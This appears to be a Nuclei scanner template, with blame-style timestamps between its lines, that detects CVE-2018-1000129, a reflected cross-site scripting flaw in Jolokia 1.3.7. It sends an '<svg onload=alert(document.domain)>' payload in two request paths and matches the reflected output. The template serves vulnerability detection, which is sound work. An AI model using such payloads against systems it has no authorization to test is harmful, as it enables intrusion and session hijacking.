2021-01-02 05:00:39 +00:00
id : CVE-2018-1000129
2020-06-17 09:16:11 +00:00
info :
2022-08-19 20:44:38 +00:00
name : Jolokia 1.3.7 - Cross-Site Scripting
2022-05-16 23:31:59 +00:00
author : mavericknerd,0h1in9e,daffainfo
2021-09-10 11:26:40 +00:00
severity : medium
2022-05-17 06:56:18 +00:00
description : |
2022-08-19 20:44:38 +00:00
Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:57:14 +00:00
remediation : |
Upgrade to a patched version of Jolokia or apply the necessary security patches to mitigate the XSS vulnerability.
2021-09-10 11:26:40 +00:00
reference :
- https://jolokia.org/#Security_fixes_with_1.5.0
- https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad
2022-05-16 23:31:59 +00:00
- https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
- https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/
2022-08-19 20:44:38 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000129
2022-04-22 10:38:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2018-1000129
cwe-id : CWE-79
2023-11-10 17:07:52 +00:00
epss-score : 0.00257
2023-12-12 11:07:52 +00:00
epss-percentile : 0.63293
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : jolokia
product : jolokia
tags : cve,cve2018,jolokia,xss
2020-06-17 09:16:11 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-06-17 09:16:11 +00:00
- method : GET
path :
2022-05-16 23:31:59 +00:00
- "{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
- "{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-06-17 09:16:11 +00:00
matchers :
- type : word
2022-05-16 23:31:59 +00:00
part : body
2020-06-17 09:16:11 +00:00
words :
2020-09-01 12:42:12 +00:00
- "<svg onload=alert(document.domain)>"
2022-05-16 23:31:59 +00:00
- "java.lang.IllegalArgumentException"
- "No type with name"
condition : and
2020-09-01 12:42:12 +00:00
- type : word
2022-05-16 23:31:59 +00:00
part : header
2020-09-01 12:42:12 +00:00
words :
- "text/html"
2022-05-17 06:55:30 +00:00
- type : status
status :
- 200
2023-12-29 09:30:44 +00:00
# digest: 4a0a004730450221008a61d5fe8b4c920a9ff5bed18b8666320288d3c3db08180072cfcfb376687733022058824b1359b49a021788729c453487a7d8206fe18ca070e8da78b853e891d00f:922c64590222798bb761d5b6d8e72950